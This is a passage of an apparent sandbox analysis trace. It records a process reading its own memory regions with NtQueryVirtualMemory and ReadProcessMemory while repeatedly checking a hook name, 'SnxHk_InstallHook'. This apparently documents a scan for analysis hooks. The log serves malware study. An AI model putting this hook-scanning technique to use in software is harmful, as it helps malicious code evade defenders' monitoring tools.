out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x1c000) returned 1 [0041.098] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.098] GetCurrentProcess () returned 0xffffffff [0041.098] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x746a0000, lpBuffer=0x2c42a60, nSize=0xb000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0xb000) returned 1 [0041.100] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.100] GetCurrentProcess () returned 0xffffffff [0041.100] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x746b0000, lpBuffer=0x2c42a60, nSize=0xd000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0xd000) returned 1 [0041.101] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.101] GetCurrentProcess () returned 0xffffffff [0041.102] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x746c0000, lpBuffer=0x2ce0048, nSize=0x3c000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x3c000) returned 1 [0041.107] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.107] GetCurrentProcess () returned 0xffffffff [0041.107] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74700000, lpBuffer=0x2c42a60, nSize=0x6000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x6000) returned 1 [0041.108] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.108] GetCurrentProcess () returned 0xffffffff [0041.109] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74710000, lpBuffer=0x4400020, nSize=0xe7000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4400020*, lpNumberOfBytesRead=0x18a9ac*=0xe7000) returned 1 [0041.132] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.132] GetCurrentProcess () returned 0xffffffff [0041.133] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74800000, lpBuffer=0x2ce0048, nSize=0x22000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x22000) returned 1 [0041.136] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.136] GetCurrentProcess () returned 0xffffffff [0041.136] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74830000, lpBuffer=0x4400020, nSize=0xc8000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4400020*, lpNumberOfBytesRead=0x18a9ac*=0xc8000) returned 1 [0041.161] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.161] GetCurrentProcess () returned 0xffffffff [0041.161] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74900000, lpBuffer=0x2ce0048, nSize=0x3c000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x3c000) returned 1 [0041.166] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.166] GetCurrentProcess () returned 0xffffffff [0041.167] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74940000, lpBuffer=0x2ce0048, nSize=0x32000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x32000) returned 1 [0041.175] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.175] GetCurrentProcess () returned 0xffffffff [0041.175] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74980000, lpBuffer=0x2ce0048, nSize=0x14000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x14000) returned 1 [0041.176] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.176] GetCurrentProcess () returned 0xffffffff [0041.176] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x749a0000, lpBuffer=0x2ce0048, nSize=0x12000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x12000) returned 1 [0041.177] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.177] GetCurrentProcess () returned 0xffffffff [0041.177] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74ac0000, lpBuffer=0x2c42a60, nSize=0xc000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0xc000) returned 1 [0041.179] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.179] GetCurrentProcess () returned 0xffffffff [0041.179] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74ad0000, lpBuffer=0x2ce0048, nSize=0x60000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.179] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b30000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b30000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.179] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b31000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b31000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0xf000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.179] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b40000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b40000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0x17000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.179] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b57000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b57000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0x9000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.180] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b60000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b60000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.180] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b61000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b61000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0xf000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.180] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b70000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b70000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.180] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b75000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b75000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0xb000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.180] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b80000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b80000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.180] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b81000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b81000, AllocationBase=0x74b30000, AllocationProtect=0x80, RegionSize=0xf000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.180] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b90000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b90000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.180] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.180] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.180] GetCurrentProcess () returned 0xffffffff [0041.180] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74b30000, lpBuffer=0x2d40050, nSize=0x60000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2d40050, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74b90000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74b90000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74ca0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74ca0000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74ca1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74ca1000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0xf000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74cb0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74cb0000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0x6d000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74d1d000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74d1d000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74d20000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74d20000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74d21000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74d21000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0xf000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74d30000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74d30000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0x5b000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74d8b000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74d8b000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0x5000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74d90000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74d90000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74d94000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74d94000, AllocationBase=0x74ca0000, AllocationProtect=0x80, RegionSize=0xc000, State=0x2000, Protect=0x0, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74da0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74da0000, AllocationBase=0x74da0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.181] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.181] GetCurrentProcess () returned 0xffffffff [0041.181] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74ca0000, lpBuffer=0x4400020, nSize=0x100000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4400020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74da0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74da0000, AllocationBase=0x74da0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74da1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74da1000, AllocationBase=0x74da0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74da7000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74da7000, AllocationBase=0x74da0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.181] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74da8000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74da8000, AllocationBase=0x74da0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.182] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74daa000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74daa000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x6000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.182] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.182] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.182] GetCurrentProcess () returned 0xffffffff [0041.182] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74da0000, lpBuffer=0x2c42a60, nSize=0xa000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0xa000) returned 1 [0041.183] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.183] GetCurrentProcess () returned 0xffffffff [0041.183] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74db0000, lpBuffer=0x4510020, nSize=0xcc000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4510020*, lpNumberOfBytesRead=0x18a9ac*=0xcc000) returned 1 [0041.212] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.212] GetCurrentProcess () returned 0xffffffff [0041.212] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74e80000, lpBuffer=0x2da0058, nSize=0x19000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2da0058*, lpNumberOfBytesRead=0x18a9ac*=0x19000) returned 1 [0041.214] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.214] GetCurrentProcess () returned 0xffffffff [0041.214] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74ea0000, lpBuffer=0x2700020, nSize=0xa0000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2700020*, lpNumberOfBytesRead=0x18a9ac*=0xa0000) returned 1 [0041.233] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.233] GetCurrentProcess () returned 0xffffffff [0041.234] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75ee0000, lpBuffer=0x4510020, nSize=0xf0000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4510020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.234] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75fd0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x75fd0000, AllocationBase=0x75fd0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.234] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75fd1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x75fd1000, AllocationBase=0x75fd0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.234] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75fd3000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x75fd3000, AllocationBase=0x75fd0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.234] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75fd4000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x75fd4000, AllocationBase=0x75fd0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.234] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75fd6000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x75fd6000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.235] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.235] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.235] GetCurrentProcess () returned 0xffffffff [0041.235] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75fd0000, lpBuffer=0x2c42a60, nSize=0x6000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x6000) returned 1 [0041.235] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.235] GetCurrentProcess () returned 0xffffffff [0041.235] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x75fe0000, lpBuffer=0x2700020, nSize=0x8f000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2700020*, lpNumberOfBytesRead=0x18a9ac*=0x8f000) returned 1 [0041.254] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.254] GetCurrentProcess () returned 0xffffffff [0041.254] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x762d0000, lpBuffer=0x2da0058, nSize=0x12000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2da0058*, lpNumberOfBytesRead=0x18a9ac*=0x12000) returned 1 [0041.255] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.255] GetCurrentProcess () returned 0xffffffff [0041.255] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x762f0000, lpBuffer=0x2da0058, nSize=0x35000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2da0058*, lpNumberOfBytesRead=0x18a9ac*=0x35000) returned 1 [0041.262] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.262] GetCurrentProcess () returned 0xffffffff [0041.262] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x763c0000, lpBuffer=0x2da0058, nSize=0x27000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2da0058*, lpNumberOfBytesRead=0x18a9ac*=0x27000) returned 1 [0041.265] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.265] GetCurrentProcess () returned 0xffffffff [0041.265] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x763f0000, lpBuffer=0x2700020, nSize=0x90000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2700020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.265] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x76480000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x76480000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.265] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x76510000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x76510000, AllocationBase=0x76510000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.265] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x76511000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x76511000, AllocationBase=0x76510000, AllocationProtect=0x80, RegionSize=0x5b000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.265] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7656c000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7656c000, AllocationBase=0x76510000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.265] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7656e000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7656e000, AllocationBase=0x76510000, AllocationProtect=0x80, RegionSize=0x3f000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.265] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x765ad000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x765ad000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.266] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.266] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.266] GetCurrentProcess () returned 0xffffffff [0041.266] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76510000, lpBuffer=0x4610020, nSize=0x9d000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4610020*, lpNumberOfBytesRead=0x18a9ac*=0x9d000) returned 1 [0041.282] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.282] GetCurrentProcess () returned 0xffffffff [0041.282] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x765b0000, lpBuffer=0x2da0058, nSize=0x46000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2da0058*, lpNumberOfBytesRead=0x18a9ac*=0x46000) returned 1 [0041.286] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.286] GetCurrentProcess () returned 0xffffffff [0041.286] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76600000, lpBuffer=0x4610020, nSize=0x110000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4610020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.286] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x76710000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x76710000, AllocationBase=0x76710000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.286] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x76711000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x76711000, AllocationBase=0x76710000, AllocationProtect=0x80, RegionSize=0x145000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.286] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x76856000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x76856000, 